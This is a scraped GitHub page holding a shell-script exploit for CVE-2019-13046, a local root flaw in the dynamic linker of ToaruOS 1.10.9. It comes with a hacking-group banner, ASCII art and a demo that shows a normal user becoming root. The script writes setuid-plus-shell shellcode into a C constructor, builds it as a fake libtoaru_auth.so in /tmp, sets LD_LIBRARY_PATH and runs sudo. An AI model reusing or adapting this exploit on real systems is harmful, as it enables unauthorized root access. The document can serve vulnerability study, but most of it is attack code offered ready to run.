Headline
CVE-2019-13046: kowasuos/kowasu-linker.sh at master · mehsauce/kowasuos
linker/linker.c in ToaruOS through 1.10.9 has insecure LD_LIBRARY_PATH handling in setuid applications.
Permalink
Cannot retrieve contributors at this time
#!/bin/sh
The Mickey Mouse Hacking Squadron proudly presents
CVE-2019-13046
ToaruOS 1.10.9 sudo/linker local root exploit
.-“"”-.
/ . - \
\ /
.-“”-.,:.-_-.<
/ _; , / ).|
\ ; / ` `" '\
'.-| ;-.____, | .,
\ `._~_/ / /"/
,. /`-.__.-‘\`-._ ,",’ ;
\"\ / /| o \._ `-._; / ./-.
; ';, / / | `__ \ `-.,( / //.-'
:\ \\;_.-" ; |.-"` ``\ /-. /.-'
:\ .\),.-' / }{ | ‘…’
\ .-\ | , /
‘…’ ;’ , /
( __ `;–;’__`)
`//’` `||`
_// ||
.-"-._,(__) .(__).-“”-.
/ \ / \
\ / \ /
`’–=="–` `–""==–’`
local@livecd ~$ whoami
local
local@livecd ~$ ./kowasu-linker.sh
0@livecd /home/local# whoami
root
We use shellcode because we replaced libc and this keeps things simple.
echo “unsigned char shellcode[] = {” > /tmp/x.c
echo " 0x31, 0xc0, 0x04, 0x18, 0x31, 0xdb, 0xcd, 0x7f, 0xeb, 0x1a, 0x5b, 0x31," >> /tmp/x.c
echo " 0xc0, 0x88, 0x43, 0x07, 0x89, 0x5b, 0x08, 0x89, 0x43, 0x0c, 0x04, 0x07," >> /tmp/x.c
echo " 0x8d, 0x4b, 0x08, 0x8d, 0x53, 0x0c, 0xcd, 0x7f, 0x31, 0xc0, 0xcd, 0x7f," >> /tmp/x.c
echo " 0xe8, 0xe1, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68," >> /tmp/x.c
echo " 0x68, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58" >> /tmp/x.c
echo “};” >> /tmp/x.c
echo "__attribute__((constructor)) void mehness(void)" >> /tmp/x.c
echo “{” >> /tmp/x.c
echo " ((void (*)(void))shellcode)();" >> /tmp/x.c
echo “}” >> /tmp/x.c
gcc -fPIC -shared /tmp/x.c -o /tmp/libc.so
rm /tmp/x.c
cp /tmp/libc.so /tmp/libtoaru_auth.so
LD_LIBRARY_PATH=/tmp
sudo mehness